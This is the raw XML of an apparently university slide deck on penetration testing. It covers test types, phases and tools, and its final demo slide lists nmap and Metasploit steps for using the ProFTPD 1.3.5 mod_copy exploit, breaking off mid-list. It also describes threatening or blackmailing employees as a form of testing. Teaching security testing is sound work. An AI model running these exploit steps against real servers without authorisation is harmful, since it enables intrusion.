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LUGkIvcQmGE&amp;ab_channel=edureka%21"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3cc6649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3cc6649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5d3fa74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85d3fa74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91470309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9147030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89147030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89147030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8383afaf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8383afaf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u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://www.youtube.com/watch?v=LUGkIvcQmGE&amp;ab_channel=edureka%21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9a8083919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9a8083919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8383afaf7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8383afaf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3cc6649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3cc6649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383afaf7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383afaf7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vi"/>
              <a:t>Black Box: When the attacker has no knowledge of the target, it is referred to as a black box penetration test. This type requires a lot of time and the pen tester uses automated tools in order to find vulnerabilities and weak spots.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi"/>
              <a:t>White Box: When the penetration tester is given the complete knowledge of the target, it is called a white box penetration test. The attacker has complete knowledge of the IP addresses, controls in place, code samples, operating system details etc. It requires less time when compared to black box penetration testing.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi"/>
              <a:t>Grey Box: When the tester is having partial information about the target, it is referred to as gray box penetration testing. In this case, the attacker will have some knowledge of the target information like URLs, IP addresses, etc., butwill not have complete knowledge or access.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8383afaf7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8383afaf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749300" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="190909"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="292929"/>
              </a:buClr>
              <a:buSzPts val="1300"/>
              <a:buFont typeface="Georgia"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="292929"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Georgia"/>
                <a:ea typeface="Georgia"/>
                <a:cs typeface="Georgia"/>
                <a:sym typeface="Georgia"/>
              </a:rPr>
              <a:t>If the penetration test is conducted from outside the network, it is referred to as </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="vi" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="292929"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Georgia"/>
                <a:ea typeface="Georgia"/>
                <a:cs typeface="Georgia"/>
                <a:sym typeface="Georgia"/>
              </a:rPr>
              <a:t>external penetration testing</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="1300">
              <a:solidFill>
                <a:srgbClr val="292929"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Georgia"/>
              <a:ea typeface="Georgia"/>
              <a:cs typeface="Georgia"/>
              <a:sym typeface="Georgia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-311150" lvl="0" marL="749300" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="190909"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="292929"/>
              </a:buClr>
              <a:buSzPts val="1300"/>
              <a:buFont typeface="Georgia"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="292929"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Georgia"/>
                <a:ea typeface="Georgia"/>
                <a:cs typeface="Georgia"/>
                <a:sym typeface="Georgia"/>
              </a:rPr>
              <a:t>Suppose, the attacker is present inside the network, simulation of this scenario is referred to as </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="vi" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="292929"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Georgia"/>
                <a:ea typeface="Georgia"/>
                <a:cs typeface="Georgia"/>
                <a:sym typeface="Georgia"/>
              </a:rPr>
              <a:t>internal penetration testing</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="1300">
              <a:solidFill>
                <a:srgbClr val="292929"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Georgia"/>
              <a:ea typeface="Georgia"/>
              <a:cs typeface="Georgia"/>
              <a:sym typeface="Georgia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-311150" lvl="0" marL="749300" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="190909"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="292929"/>
              </a:buClr>
              <a:buSzPts val="1300"/>
              <a:buFont typeface="Georgia"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr i="1" lang="vi" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="292929"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Georgia"/>
                <a:ea typeface="Georgia"/>
                <a:cs typeface="Georgia"/>
                <a:sym typeface="Georgia"/>
              </a:rPr>
              <a:t>Targeted testing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="292929"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Georgia"/>
                <a:ea typeface="Georgia"/>
                <a:cs typeface="Georgia"/>
                <a:sym typeface="Georgia"/>
              </a:rPr>
              <a:t>is usually performed by the organization’s IT team and the Penetration Testing team working together</a:t>
            </a:r>
            <a:endParaRPr sz="1300">
              <a:solidFill>
                <a:srgbClr val="292929"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Georgia"/>
              <a:ea typeface="Georgia"/>
              <a:cs typeface="Georgia"/>
              <a:sym typeface="Georgia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-311150" lvl="0" marL="749300" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="190909"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="292929"/>
              </a:buClr>
              <a:buSzPts val="1300"/>
              <a:buFont typeface="Georgia"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="292929"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Georgia"/>
                <a:ea typeface="Georgia"/>
                <a:cs typeface="Georgia"/>
                <a:sym typeface="Georgia"/>
              </a:rPr>
              <a:t>In a </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="vi" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="292929"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Georgia"/>
                <a:ea typeface="Georgia"/>
                <a:cs typeface="Georgia"/>
                <a:sym typeface="Georgia"/>
              </a:rPr>
              <a:t>blind penetration test</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="292929"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Georgia"/>
                <a:ea typeface="Georgia"/>
                <a:cs typeface="Georgia"/>
                <a:sym typeface="Georgia"/>
              </a:rPr>
              <a:t>, the penetration tester is provided with no prior information except the organization name</a:t>
            </a:r>
            <a:endParaRPr sz="1300">
              <a:solidFill>
                <a:srgbClr val="292929"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Georgia"/>
              <a:ea typeface="Georgia"/>
              <a:cs typeface="Georgia"/>
              <a:sym typeface="Georgia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-311150" lvl="0" marL="749300" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="190909"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="292929"/>
              </a:buClr>
              <a:buSzPts val="1300"/>
              <a:buFont typeface="Georgia"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="292929"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Georgia"/>
                <a:ea typeface="Georgia"/>
                <a:cs typeface="Georgia"/>
                <a:sym typeface="Georgia"/>
              </a:rPr>
              <a:t>In a </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="vi" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="292929"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Georgia"/>
                <a:ea typeface="Georgia"/>
                <a:cs typeface="Georgia"/>
                <a:sym typeface="Georgia"/>
              </a:rPr>
              <a:t>double-blind test</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="292929"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Georgia"/>
                <a:ea typeface="Georgia"/>
                <a:cs typeface="Georgia"/>
                <a:sym typeface="Georgia"/>
              </a:rPr>
              <a:t>, at max, only one or two people within the organization might be aware that a test is being conducted</a:t>
            </a:r>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383afaf7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383afaf7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vi"/>
              <a:t>Network Penetration Testing: discovering weaknesses and vulnerabilities related to the network infrastructure of the organization. It involves, firewall configuration &amp; bypass testing, Stateful analysis testing, DNS attacks.Most common software packages which are examined during this test include: SSH, Database (SQL Server, MySQL..), SMTP, FTP.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi"/>
              <a:t>Application Penetration Testing: checks, if any security vulnerabilities or weaknesses are discovered in web-based applications, Core application components such as ActiveX, Silverlight, and Java Applets, and APIs are all examined. Therefore this kind of testing requires a lot of time</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi"/>
              <a:t>Wireless Penetration Testing: all of the wireless devices which are used in a corporation are tested. It includes items such as tablets, notebooks, smartphones, etc. This test spots vulnerabilities in terms of wireless access points, admin credentials, and wireless protocols.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi"/>
              <a:t>Social Engineering: Test involves attempting to get confidential or sensitive information by purposely tricking an employee of the organization. You have two subsets here.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi"/>
              <a:t>Remote testing — involves tricking an employee to reveal sensitive information via an electronic means</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi"/>
              <a:t>Physical testing — involves the use of a physical means to gather sensitive information, like threaten or blackmail an employee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vi"/>
              <a:t>Client-Side Penetration Testing: identify security issues in terms of software running on the customer’s workstations. Its primary goal is to search and exploit vulnerabilities in client-side software programs. For example, web browsers (such as Internet Explorer, Google Chrome, Mozilla Firefox, Safari), content creation software packages (such as Adobe Framemaker and Adobe RoboHelp), media players, etc.</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vi"/>
              <a:t>Mobile Application: This test has also become very essential today. This is due to the fact that all the organizations are developing and providing access access to their customers through mobile apps on android and iOS mobile phones. This test ensure that mobile apps are secure enough to protect personal informations of their clients while using mobile apps.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3cc6649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3cc6649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vi"/>
              <a:t>Reconnaissance &amp; Planning: the attacker gathers as much information about the target as possible. The data can be IP addresses, domain details, mail servers, network topology, etc. In this phase, he also defines the scope and goals of a test, including the systems to be addressed and the testing methods to be used. An expert penetration tester will spend most of the time in this phase, this will help with further phases of the attack.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi"/>
              <a:t>Scanning: Based on the data collected in the first step, the attacker will interact with the target with an aim to identify the vulnerabilities. This helps a penetration tester to launch attacks using vulnerabilities in the system. This phase includes the use of tools such as port scanners, ping tools, vulnerability scanners, and network mappers. While testing web applications, the scanning part can be either dynamic or static. In static scanning, the aim is to identify the vulnerable functions, libraries, and logic implementation. Dynamic analysis is the more practical way of scanning compared to static analysis where the tester will pass various inputs to the application and record the responses.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi"/>
              <a:t>Gaining Access: This stage uses web application attacks, such as cross-site scripting, SQL injection and backdoors, to uncover a target’s vulnerabilities. Testers then try and exploit these vulnerabilities, typically by escalating privileges, stealing data, intercepting traffic, etc., to understand the damage they can cause.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi"/>
              <a:t>Maintaining access: The goal of this stage is to see if the vulnerability can be used to achieve a persistent presence in the exploited system— long enough for a bad actor to gain in-depth access. The idea is to imitate advanced persistent threats, which often remain in a system for months in order to steal an organization’s most sensitive data.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi"/>
              <a:t>Analysis: the results of the penetration test are then compiled into a report detailing:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi"/>
              <a:t>Specific vulnerabilities that were exploited</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi"/>
              <a:t>Sensitive data that was accessed</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi"/>
              <a:t>The amount of time the pen tester was able to remain in the system undetected</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi"/>
              <a:t>This information is analyzed by security personnel to help configure an enterprise’s WAF settings and other application security solutions to patch vulnerabilities and protect against future attacks.</a:t>
            </a:r>
            <a:endParaRPr/>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55325"/>
            <a:ext cx="8520600" cy="104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vi"/>
              <a:t>Penetration Testing</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi"/>
              <a:t>(Pen Test)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Dr Trương Tuấn Anh</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="56" name="Google Shape;56;p13"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="121800" y="237875"/>
            <a:ext cx="1211975" cy="1211975"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57" name="Google Shape;57;p13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1622650" y="536063"/>
            <a:ext cx="209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TRƯỜNG ĐẠI HỌC BÁCH KHOA TP HCM</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58" name="Google Shape;58;p13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5638975" y="3834025"/>
            <a:ext cx="2943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t>Nguyễn Xuân Vĩnh Hưng. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi"/>
              <a:t>MSHV: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi"/>
              <a:t>1970589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What tools are used for Penetration Testing?</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vi"/>
              <a:t>Nessus — It is a network and web application vulnerability scanner, it can perform different types of scans and help a penetration tester identify vulnerabilities.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-300037" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi"/>
              <a:t>Metasploit — It is an exploitation framework that has been packed with various capabilities. A skilled attacker can generate payloads, shellcodes, gain access, and perform privilege escalation attacks using Metasploit.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-300037" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi"/>
              <a:t>Backtrack (Now Kali Linux): Debian-based Linux distribution with open source security tool</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-300037" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi"/>
              <a:t>Wireshark — It is a tool for profiling network traffic and for analyzing network packets.</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0" y="2911899"/>
            <a:ext cx="2610350" cy="1370425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="116" name="Google Shape;116;p22"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4706300" y="2465425"/>
            <a:ext cx="1994448" cy="2423400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="117" name="Google Shape;117;p22"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2531725" y="2549800"/>
            <a:ext cx="2254650" cy="2254650"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="118" name="Google Shape;118;p22"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6783325" y="2571750"/>
            <a:ext cx="2360674" cy="1887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Demo</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vi"/>
              <a:t>Open: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi"/>
              <a:t>nmap -sV target_ip</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-325755" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi"/>
              <a:t>Start </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi"/>
              <a:t>Metasploit:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi"/>
              <a:t>metasploit-framework</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi"/>
              <a:t>/bin/msfconsole</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-325755" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi"/>
              <a:t>msf </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi"/>
              <a:t>show exploits: </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-325755" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi"/>
              <a:t>Search </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi"/>
              <a:t>vulnerability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi"/>
              <a:t> of software: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi"/>
              <a:t>search ProFTPD 1.3.5</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-325755" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi"/>
              <a:t>See info of vulnerability : info </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi"/>
              <a:t>exploit/unix/ftp/proftpd_modcopy_exec</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-325755" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi"/>
              <a:t>Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi"/>
              <a:t>vulnerability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi"/>
              <a:t>use exploit/unix/ftp/proftpd_modcopy_exec</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-325755" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi"/>
              <a:t>See all options: show option </a:t>
            </a:r>
